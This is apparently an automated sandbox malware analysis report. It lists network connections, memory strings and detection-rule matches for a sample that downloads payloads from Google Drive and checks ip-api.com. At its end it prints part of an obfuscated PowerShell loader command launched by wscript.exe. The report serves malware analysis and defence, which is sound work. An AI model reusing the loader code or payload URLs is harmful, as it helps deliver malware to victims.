            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: ip-api.com
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1vuOovPZc76t5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?id=1TuX3pGVQOuYuN0PVf0S1vuOovPZc76t5&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1kTBjYXwSaLf73tP79eJTEXDnkCOgv_e4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1kTBjYXwSaLf73tP79eJTEXDnkCOgv_e4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1vuOovPZc76t5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?id=1TuX3pGVQOuYuN0PVf0S1vuOovPZc76t5&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1kTBjYXwSaLf73tP79eJTEXDnkCOgv_e4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1kTBjYXwSaLf73tP79eJTEXDnkCOgv_e4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: ip-api.com
            Source: powershell.exe, 00000009.00000002.882935125828.000002167215A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.878904636075.0000000002AB1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.878845480817.0000000005108000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.882847947414.0000000005102000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.878864713619.0000000005108000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.880185049304.0000000005102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: powershell.exe, 00000009.00000002.882935125828.000002167215A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.878904636075.0000000002AB1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.878845480817.0000000005108000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.882847947414.0000000005102000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.878864713619.0000000005108000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.880185049304.0000000005102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: powershell.exe, 0000000D.00000002.878917749751.0000000008716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microso
            Source: wab.exe, 0000000F.00000002.882856308898.0000000020C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
            Source: wab.exe, 0000000F.00000002.882856308898.0000000020C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
            Source: powershell.exe, 00000009.00000002.882848532717.000002165B480000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.882926973942.0000021669E6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.878910754934.0000000005737000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.878910754934.0000000005874000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000009.00000002.882848532717.000002165B300000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.882848532717.000002165A028000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.878906475177.0000000004828000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 0000000D.00000002.878906475177.0000000004828000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png4
            Source: powershell.exe, 00000009.00000002.882848532717.000002165A028000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXz
            Source: powershell.exe, 00000009.00000002.882848532717.000002165B32B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.882848532717.000002165B300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngh
            Source: powershell.exe, 00000009.00000002.882848532717.0000021659E01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.878906475177.00000000046D1000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.882856308898.0000000020C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000009.00000002.882848532717.000002165B100000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: powershell.exe, 00000009.00000002.882848532717.000002165B300000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.882848532717.000002165A028000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.878906475177.0000000004828000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 0000000D.00000002.878906475177.0000000004828000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html4
            Source: powershell.exe, 00000009.00000002.882848532717.000002165A028000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz
            Source: powershell.exe, 00000009.00000002.882848532717.000002165B32B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.882848532717.000002165B300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlh
            Source: powershell.exe, 00000009.00000002.882848532717.0000021659E01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 0000000D.00000002.878906475177.00000000046D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB7q
            Source: powershell.exe, 00000009.00000002.882848532717.000002165A2CD000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.878845630299.0000000005134000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: powershell.exe, 0000000D.00000002.878910754934.0000000005874000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 0000000D.00000002.878910754934.0000000005874000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 0000000D.00000002.878910754934.0000000005874000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.g
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.go
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.goo
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.goog
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googl
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.c
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.co
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.882848532717.000002165A028000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.882847947414.00000000050AE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.880185049304.00000000050AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: wab.exe, 0000000F.00000002.882847947414.00000000050AE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.880185049304.00000000050AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/FP
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/u
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?e
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?ex
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?exp
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?expo
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?expor
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=d
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=do
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=dow
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=down
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=downl
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=downlo
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=downloa
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&i
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1T
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Tu
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3p
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pG
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGV
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQ
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQO
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOu
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuY
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYu
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0P
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PV
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf0
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf0S
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1v
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1vu
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1vuO
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1vuOo
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1vuOov
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1vuOovP
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1vuOovPZ
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1vuOovPZc
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1vuOovPZc7
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1vuOovPZc76
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1vuOovPZc76t
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.882848532717.000002165A028000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1vuOovPZc76t5
            Source: powershell.exe, 0000000D.00000002.878906475177.0000000004828000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1vuOovPZc76t5pN
            Source: wab.exe, 0000000F.00000002.882847947414.00000000050C4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.880185049304.00000000050C4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.882848779553.00000000053B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1kTBjYXwSaLf73tP79eJTEXDnkCOgv_e4
            Source: wab.exe, 0000000F.00000002.882847947414.00000000050C4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.880185049304.00000000050C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1kTBjYXwSaLf73tP79eJTEXDnkCOgv_e4J
            Source: powershell.exe, 00000009.00000002.882848532717.000002165A2D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
            Source: wab.exe, 0000000F.00000002.882847947414.0000000005102000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.878864713619.0000000005134000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.880185049304.0000000005102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: powershell.exe, 00000009.00000002.882848532717.000002165A2D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.882848532717.000002165A2CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1TuX3pGVQOuYuN0PVf0S1vuOovPZc76t5&export=download
            Source: wab.exe, 0000000F.00000003.878864713619.0000000005108000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.878845630299.0000000005134000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1kTBjYXwSaLf73tP79eJTEXDnkCOgv_e4&export=download
            Source: wab.exe, 0000000F.00000003.880185049304.00000000050D4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.882847947414.00000000050D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1kTBjYXwSaLf73tP79eJTEXDnkCOgv_e4&export=downloadDP
            Source: wab.exe, 0000000F.00000002.882847947414.00000000050EF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.880185049304.00000000050EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1kTBjYXwSaLf73tP79eJTEXDnkCOgv_e4&export=downloadSP
            Source: powershell.exe, 00000009.00000002.882848532717.000002165B300000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.882848532717.000002165A028000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.878906475177.0000000004828000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 0000000D.00000002.878906475177.0000000004828000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester4
            Source: powershell.exe, 00000009.00000002.882848532717.000002165A028000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXz
            Source: powershell.exe, 00000009.00000002.882848532717.000002165B32B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.882848532717.000002165B300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pesterh
            Source: powershell.exe, 00000009.00000002.882848532717.000002165C0DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000009.00000002.882848532717.000002165B480000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.882926973942.0000021669E6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.878910754934.0000000005737000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.878910754934.0000000005874000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 00000009.00000002.882848532717.000002165B100000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
            Source: powershell.exe, 00000009.00000002.882848532717.000002165A2CD000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.878845630299.0000000005134000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: powershell.exe, 00000009.00000002.882848532717.000002165A2CD000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.878845630299.0000000005134000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: powershell.exe, 00000009.00000002.882848532717.000002165A2CD000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.878845630299.0000000005134000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: powershell.exe, 00000009.00000002.882848532717.000002165A2CD000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.878845630299.0000000005134000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: powershell.exe, 00000009.00000002.882848532717.000002165A2CD000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.878845630299.0000000005134000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
            Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
            Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
            Source: unknownHTTPS traffic detected: 142.250.191.110:443 -> 192.168.11.30:49949 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.2.33:443 -> 192.168.11.30:49950 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.191.110:443 -> 192.168.11.30:49951 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.2.33:443 -> 192.168.11.30:49952 version: TLS 1.2

            System Summary

            barindex
            Source: amsi32_6840.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 2680, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 6840, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5088
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 5088
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 5088Jump to behavior
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds';If (${host}.CurrentCulture) {$Smaastykker++;}Function Immatrikulationens($Marios){$Syntomy=$Marios.Length-$Smaastykker;$Pronenesses='SUBsTRI';$Pronenesses+='ng';For( $Dipsomaniacs=2;$Dipsomaniacs -lt $Syntomy;$Dipsomaniacs+=3){$Nugacities+=$Marios.$Pronenesses.Invoke( $Dipsomaniacs, $Smaastykker);}$Nugacities;}function Influerende($Svippedes){ . ($Gnier111) ($Svippedes);}$Sclaffs=Immatrikulationens 'HuMN,oGazHuiKal,elBeaDa/p,5La.Fr0Ru He(A WPuiCun UdKuo .wSls l .N sTEp Li1 B0Fy.P,0.y;I. .eWCaiB,nS,6Di4Te;Vi Bx,o6E.4,i;No BurUlvGl:Un1Co2Sy1D.. U0 n)Sw 